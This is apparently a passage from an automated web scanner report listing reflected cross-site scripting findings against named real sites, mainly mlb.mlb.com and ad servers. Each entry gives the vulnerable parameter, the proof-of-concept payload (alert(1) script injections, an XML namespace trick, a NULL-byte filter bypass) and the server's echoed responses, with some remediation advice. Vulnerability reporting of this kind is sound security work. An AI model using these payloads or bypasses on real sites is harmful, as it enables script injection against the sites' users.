HTTP/1.1 200 OK Server: Oracle-iPlanet-Web-Server/7.0 Content-Type: text/html;charset=utf-8 Content-Length: 114095 Cache-Control: max-age=600 Expires: Sun, 02 Oct 2011 23:00:45 GMT Date: Sun, 02 Oct 2011 22:50:45 GMT Connection: close Vary: Accept-Encoding
The value of the game_type request parameter is copied into the HTML document as plain text between tags. The payload 653da<script>alert(1)</script>bdf1290c6d2 was submitted in the game_type parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 500 Internal Server Error Server: Oracle-iPlanet-Web-Server/7.0 Content-Type: text;charset=ISO-8859-1 Content-Length: 145 Cneonction: close X-N: S Date: Sun, 02 Oct 2011 22:51:40 GMT Connection: close
com.bamnetworks.lookup.servlet.LookupException: game_type must be a valid integer value and you passed: 653da<script>alert(1)</script>bdf1290c6d2
The value of the results request parameter is copied into the HTML document as plain text between tags. The payload 50aa1<script>alert(1)</script>9d81154f3fc was submitted in the results parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 500 Internal Server Error Server: Oracle-iPlanet-Web-Server/7.0 Content-Type: text;charset=ISO-8859-1 Content-Length: 145 Cneonction: close X-N: S Date: Sun, 02 Oct 2011 22:51:31 GMT Connection: close
com.bamnetworks.lookup.servlet.LookupException: results must be a valid integer value and you passed: 550aa1<script>alert(1)</script>9d81154f3fc
The value of the season request parameter is copied into the HTML document as plain text between tags. The payload 49e07<script>alert(1)</script>7a3efe3920b was submitted in the season parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 500 Internal Server Error Server: Oracle-iPlanet-Web-Server/7.0 Content-Type: text;charset=ISO-8859-1 Content-Length: 147 Cneonction: close X-N: S Date: Sun, 02 Oct 2011 22:51:36 GMT Connection: close
com.bamnetworks.lookup.servlet.LookupException: season must be a valid integer value and you passed: 201149e07<script>alert(1)</script>7a3efe3920b
The value of the game_type request parameter is copied into the HTML document as plain text between tags. The payload a0bc8<script>alert(1)</script>fb219e84209 was submitted in the game_type parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 500 Internal Server Error Server: Oracle-iPlanet-Web-Server/7.0 Content-Type: text;charset=ISO-8859-1 Content-Length: 145 Cneonction: close X-N: S Date: Sun, 02 Oct 2011 22:51:39 GMT Connection: close
com.bamnetworks.lookup.servlet.LookupException: game_type must be a valid integer value and you passed: a0bc8<script>alert(1)</script>fb219e84209
The value of the results request parameter is copied into the HTML document as plain text between tags. The payload 45ef3<script>alert(1)</script>ebf1e9ad065 was submitted in the results parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 500 Internal Server Error Server: Oracle-iPlanet-Web-Server/7.0 Content-Type: text;charset=ISO-8859-1 Content-Length: 145 Cneonction: close X-N: S Date: Sun, 02 Oct 2011 22:51:30 GMT Connection: close
com.bamnetworks.lookup.servlet.LookupException: results must be a valid integer value and you passed: 545ef3<script>alert(1)</script>ebf1e9ad065
The value of the season request parameter is copied into the HTML document as plain text between tags. The payload 3edc5<script>alert(1)</script>7a5d2535dc9 was submitted in the season parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 500 Internal Server Error Server: Oracle-iPlanet-Web-Server/7.0 Content-Type: text;charset=ISO-8859-1 Content-Length: 147 Cneonction: close X-N: S Date: Sun, 02 Oct 2011 22:51:35 GMT Connection: close
com.bamnetworks.lookup.servlet.LookupException: season must be a valid integer value and you passed: 20113edc5<script>alert(1)</script>7a5d2535dc9
The value of the game_type request parameter is copied into the HTML document as plain text between tags. The payload 84a61<script>alert(1)</script>3a229642abe was submitted in the game_type parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the season request parameter is copied into the HTML document as plain text between tags. The payload 391a1<script>alert(1)</script>747ddddc175 was submitted in the season parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the sport_code request parameter is copied into the HTML document as plain text between tags. The payload 6dc0c<script>alert(1)</script>6bf97234ae2 was submitted in the sport_code parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the season request parameter is copied into the HTML document as plain text between tags. The payload eb4c9<script>alert(1)</script>3bb2fc80d72 was submitted in the season parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the game_type request parameter is copied into the HTML document as plain text between tags. The payload 4076b<script>alert(1)</script>4bb89352961 was submitted in the game_type parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the season request parameter is copied into the HTML document as plain text between tags. The payload ba88d<script>alert(1)</script>3406a323a60 was submitted in the season parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the sport_code request parameter is copied into the HTML document as plain text between tags. The payload af64f<script>alert(1)</script>9367318d0b9 was submitted in the sport_code parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the all_star_sw request parameter is copied into the HTML document as plain text between tags. The payload fc18d<script>alert(1)</script>17400399bd2 was submitted in the all_star_sw parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the season request parameter is copied into the HTML document as plain text between tags. The payload b0011<script>alert(1)</script>18b5dcaa26a was submitted in the season parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the sport_code request parameter is copied into the HTML document as plain text between tags. The payload 7a269<script>alert(1)</script>b15d36caf40 was submitted in the sport_code parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the org_id request parameter is copied into the XML document as plain text between tags. The payload f669b<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>23a3982b8fe was submitted in the org_id parameter. This input was echoed as f669b<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>23a3982b8fe in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.
HTTP/1.1 200 OK Server: Oracle-iPlanet-Web-Server/7.0 Last-Modified: Sun, 02 Oct 2011 22:51:27 GMT Content-Type: text/xml;charset=ISO-8859-1 Content-Length: 1411 Cache-Control: max-age=120 Date: Sun, 02 Oct 2011 22:51:27 GMT Connection: close Vary: Accept-Encoding
<!-- Copyright 2011 MLB Advanced Media, L.P. Use of any content on this page acknowledges agreement to the terms posted here http://gdx.mlb.com/components/copyright.txt --><properties_info_events_season>org_id must be a valid double value and you passed: 1f669b<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>23a3982b8fe<schedule_event_info> ...[SNIP]...
The value of the season request parameter is copied into the XML document as plain text between tags. The payload 83cc2<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>90e66fe3091 was submitted in the season parameter. This input was echoed as 83cc2<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>90e66fe3091 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.
HTTP/1.1 200 OK Server: Oracle-iPlanet-Web-Server/7.0 Last-Modified: Sun, 02 Oct 2011 22:51:20 GMT Content-Type: text/xml;charset=ISO-8859-1 Content-Length: 528 Cache-Control: max-age=120 Date: Sun, 02 Oct 2011 22:51:20 GMT Connection: close Vary: Accept-Encoding
<!-- Copyright 2011 MLB Advanced Media, L.P. Use of any content on this page acknowledges agreement to the terms posted here http://gdx.mlb.com/components/copyright.txt --><properties_info_events_season>season must be a valid double value and you passed: 201183cc2<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>90e66fe3091season must be a valid double value and you passed: 201183cc2<a xmlns:a='http://www.w3.org/1999/xhtml'> ...[SNIP]...
The value of the sport_code request parameter is copied into the XML document as plain text between tags. The payload af614<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>e4f8b4d403d was submitted in the sport_code parameter. This input was echoed as af614<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>e4f8b4d403d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.
HTTP/1.1 200 OK Server: Oracle-iPlanet-Web-Server/7.0 Last-Modified: Sun, 02 Oct 2011 22:51:21 GMT Content-Type: text/xml;charset=ISO-8859-1 Content-Length: 1144 Cache-Control: max-age=120 Date: Sun, 02 Oct 2011 22:51:21 GMT Connection: close Vary: Accept-Encoding
<!-- Copyright 2011 MLB Advanced Media, L.P. Use of any content on this page acknowledges agreement to the terms posted here http://gdx.mlb.com/components/copyright.txt --><properties_info_events_s ...[SNIP]... </org_history>sport_code must be a valid double value and you passed: af614<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>e4f8b4d403d</properties_info_events_season>
The value of the league_id request parameter is copied into the HTML document as plain text between tags. The payload 83c43<script>alert(1)</script>275b810be46 was submitted in the league_id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 500 Internal Server Error Server: Oracle-iPlanet-Web-Server/7.0 Content-Type: text;charset=ISO-8859-1 Content-Length: 149 Cneonction: close X-N: S Date: Sun, 02 Oct 2011 22:51:36 GMT Connection: close
com.bamnetworks.lookup.servlet.LookupException: league_id must be a valid integer value and you passed: 10383c43<script>alert(1)</script>275b810be46
The value of the season request parameter is copied into the HTML document as plain text between tags. The payload 4a2c4<script>alert(1)</script>c7d498188e5 was submitted in the season parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 500 Internal Server Error Server: Oracle-iPlanet-Web-Server/7.0 Content-Type: text;charset=ISO-8859-1 Content-Length: 147 Cneonction: close X-N: S Date: Sun, 02 Oct 2011 22:51:31 GMT Connection: close
com.bamnetworks.lookup.servlet.LookupException: season must be a valid integer value and you passed: 20114a2c4<script>alert(1)</script>c7d498188e5
The value of the sit_code request parameter is copied into the HTML document as plain text between tags. The payload 8d396<script>alert(1)</script>2e73732a62a was submitted in the sit_code parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 500 Internal Server Error Server: Oracle-iPlanet-Web-Server/7.0 Content-Type: text;charset=ISO-8859-1 Content-Length: 144 Cneonction: close X-N: S Date: Sun, 02 Oct 2011 22:51:27 GMT Connection: close
com.bamnetworks.lookup.servlet.LookupException: sit_code must be a valid integer value and you passed: 8d396<script>alert(1)</script>2e73732a62a
The value of the league_id request parameter is copied into the HTML document as plain text between tags. The payload d1724<script>alert(1)</script>804d7574235 was submitted in the league_id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 500 Internal Server Error Server: Oracle-iPlanet-Web-Server/7.0 Content-Type: text;charset=ISO-8859-1 Content-Length: 149 Cneonction: close X-N: S Date: Sun, 02 Oct 2011 22:51:55 GMT Connection: close
com.bamnetworks.lookup.servlet.LookupException: league_id must be a valid integer value and you passed: 103d1724<script>alert(1)</script>804d7574235
The value of the results request parameter is copied into the HTML document as plain text between tags. The payload d1b6e<script>alert(1)</script>ee980f71c89 was submitted in the results parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 500 Internal Server Error Server: Oracle-iPlanet-Web-Server/7.0 Content-Type: text;charset=ISO-8859-1 Content-Length: 145 Cneonction: close X-N: S Date: Sun, 02 Oct 2011 22:51:51 GMT Connection: close
com.bamnetworks.lookup.servlet.LookupException: results must be a valid integer value and you passed: 5d1b6e<script>alert(1)</script>ee980f71c89
The value of the season request parameter is copied into the HTML document as plain text between tags. The payload 2f5ba<script>alert(1)</script>8d0bc9b171a was submitted in the season parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 500 Internal Server Error Server: Oracle-iPlanet-Web-Server/7.0 Content-Type: text;charset=ISO-8859-1 Content-Length: 147 Cneonction: close X-N: S Date: Sun, 02 Oct 2011 22:51:47 GMT Connection: close
com.bamnetworks.lookup.servlet.LookupException: season must be a valid integer value and you passed: 20112f5ba<script>alert(1)</script>8d0bc9b171a
The value of the sit_code request parameter is copied into the HTML document as plain text between tags. The payload caf2e<script>alert(1)</script>d94f6c200b9 was submitted in the sit_code parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 500 Internal Server Error Server: Oracle-iPlanet-Web-Server/7.0 Content-Type: text;charset=ISO-8859-1 Content-Length: 144 Cneonction: close X-N: S Date: Sun, 02 Oct 2011 22:51:44 GMT Connection: close
com.bamnetworks.lookup.servlet.LookupException: sit_code must be a valid integer value and you passed: caf2e<script>alert(1)</script>d94f6c200b9
2.138. http://mlb.mlb.com/mlb/schedule/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://mlb.mlb.com
Path:
/mlb/schedule/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d672a"><script>alert(1)</script>eb6717e2916 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the tcid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85567"><script>alert(1)</script>098ce36d245 was submitted in the tcid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the game_type request parameter is copied into the HTML document as plain text between tags. The payload 13484<script>alert(1)</script>d95a9907ac6 was submitted in the game_type parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the results request parameter is copied into the HTML document as plain text between tags. The payload 7b5ec<script>alert(1)</script>7b6642d4096 was submitted in the results parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the season request parameter is copied into the HTML document as plain text between tags. The payload 6f609<script>alert(1)</script>4c66b5fb60c was submitted in the season parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the c_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e6a6"><script>alert(1)</script>f921261e239 was submitted in the c_id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
2.144. http://mlb.mlb.com/stats/sortable.jsp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://mlb.mlb.com
Path:
/stats/sortable.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e21a"><script>alert(1)</script>a485043a9bc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the tcid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2028"><script>alert(1)</script>bbd37b46f6d was submitted in the tcid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the section request parameter is copied into the HTML document as plain text between tags. The payload 4d16f<script>alert(1)</script>e0016a98a3b was submitted in the section parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /style/nav_2011.jsp?c_id=mlb§ion=homepage4d16f<script>alert(1)</script>e0016a98a3b HTTP/1.1 Host: mlb.mlb.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: text/css,*/*;q=0.1 Referer: http://mlb.mlb.com/index.jsp Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Oracle-iPlanet-Web-Server/7.0 Content-Type: text/css;charset=ISO-8859-1 Content-Length: 17476 Cache-Control: max-age=7179 Expires: Mon, 03 Oct 2011 00:50:29 GMT Date: Sun, 02 Oct 2011 22:50:50 GMT Connection: close Vary: Accept-Encoding
The value of the cb request parameter is copied into the HTML document as plain text between tags. The payload 6f6ae<script>alert(1)</script>0d6e0b1f5a4 was submitted in the cb parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the cb request parameter is copied into the HTML document as plain text between tags. The payload 8f81c<script>alert(1)</script>32c1ecfbe81 was submitted in the cb parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the ctk request parameter is copied into the HTML document as plain text between tags. The payload d6179<script>alert(1)</script>3fec9533353 was submitted in the ctk parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cfc97"><script>alert(1)</script>e5327a0f899 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Sun, 02 Oct 2011 23:03:46 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 337 Content-Type: text/html
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce31f"><script>alert(1)</script>b8ff4cee58f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Sun, 02 Oct 2011 23:03:52 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 331 Content-Type: text/html
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 53390<script>alert(1)</script>48d372daf91 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the section request parameter is copied into the HTML document as plain text between tags. The payload 302c8<script>alert(1)</script>c976b726125 was submitted in the section parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload e1b66<script>alert(1)</script>e3a516ef303 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
2.155. http://syndication.mmismm.com/mmtnt.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://syndication.mmismm.com
Path:
/mmtnt.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 989e6'%3balert(1)//5c41763d8fe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 989e6';alert(1)//5c41763d8fe in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the 1317595850600&ASTPCT request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8defb"><script>alert(1)</script>51735ab64d1 was submitted in the 1317595850600&ASTPCT parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the 1317596177473&ASTPCT request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f26d"><script>alert(1)</script>5b6aeb91de4 was submitted in the 1317596177473&ASTPCT parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the 1317596233240&ASTPCT request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6cfbc"><script>alert(1)</script>64d9d73c90e was submitted in the 1317596233240&ASTPCT parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /p/kl/46/799/r/12/4/8/ast0k3n/cj_K_lW0d48P6qLz9wyckqiJXwdoi0k1/view.html?1317596233240&ASTPCT=http://demr.opt.fimserve.com/lnk/?ek=ADAOfa1xkkLw8PjLqkW1BuA_MZeWAr5p_Z1xLPhBBvfLu04la-ciMFsfbQjCoF1b_HYyQxIsd1h2Y3C4b2M3HVAheAPd-NWRdPIUX4z5dDRUKmrKVb4_Dk_S0iGCe-5qYn5leWi7-jYPzHgFLLWizOVXeEgkpR_fYAgS6muvrL7Jd8yszpD3ujnVNgu6_X3cXc7XnkvKxBvilGN88wiUMrk9RIG0n7gBXloArauTHinYmejF4rSteGfdjiNnnbG6BZKD72zI_fJIunhwFK5z5hd8kIM3t1xvGbNgJnFIexqShref=6cfbc"><script>alert(1)</script>64d9d73c90e HTTP/1.1 Host: this.content.served.by.adshuffle.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://demr.opt.fimserve.com/adopt/?r=h&l=19000011&pos=mrec&rnd=337696563
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache="Set-Cookie" Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: Sun, 02 Oct 2011 23:04:33 GMT Server: Microsoft-IIS/7.0 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Set-Cookie: av1=51f37.7e2e3=1002111804; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/ Set-Cookie: vcs0=v51F37:7E2E3_0_0_0_26239C_0_0; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/ Date: Sun, 02 Oct 2011 23:04:32 GMT Content-Length: 4633 Set-Cookie: NSC_betivggmf-opef=ffffffff0908150a45525d5f4f58455e445a4a423660;expires=Sun, 02-Oct-2011 23:09:33 GMT;path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="t ...[SNIP]... dDRUKmrKVb4_Dk_S0iGCe-5qYn5leWi7-jYPzHgFLLWizOVXeEgkpR_fYAgS6muvrL7Jd8yszpD3ujnVNgu6_X3cXc7XnkvKxBvilGN88wiUMrk9RIG0n7gBXloArauTHinYmejF4rSteGfdjiNnnbG6BZKD72zI_fJIunhwFK5z5hd8kIM3t1xvGbNgJnFIexqShref=6cfbc"><script>alert(1)</script>64d9d73c90ehttp://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/1113356081/v/576462396953379735/ac/335671/b/279832/c/516835/clickTag/clickTag1/click.html" target="_blank"> ...[SNIP]...
2.159. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/cj_K_lW0d48P6qLz9wyckqiJXwdoi0k1/view.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc979"><script>alert(1)</script>139d12629a4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the 1317596233240&ASTPCT request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1e3f"><script>alert(1)</script>308ad7d428d was submitted in the 1317596233240&ASTPCT parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the 1317596233240&ASTPCT request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %002f193</script><a>1e90cad1154 was submitted in the 1317596233240&ASTPCT parameter. This input was echoed as 2f193</script><a>1e90cad1154 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
2.162. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/iNIxevlHF5kAQBtAyfH5gdj8Q064zRlLFp1GKaNiBDB5pQHOTpEoNhjHys1-UgoC/view.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8334"><script>alert(1)</script>a7e1e6eb735 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fb176"-alert(1)-"1649d04200f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4187b"-alert(1)-"0b4b129bfb0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a4c8c"-alert(1)-"ce2f205a2cd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9e264"-alert(1)-"654a85d0bcf was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b64c8"-alert(1)-"44a53faa0a1 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
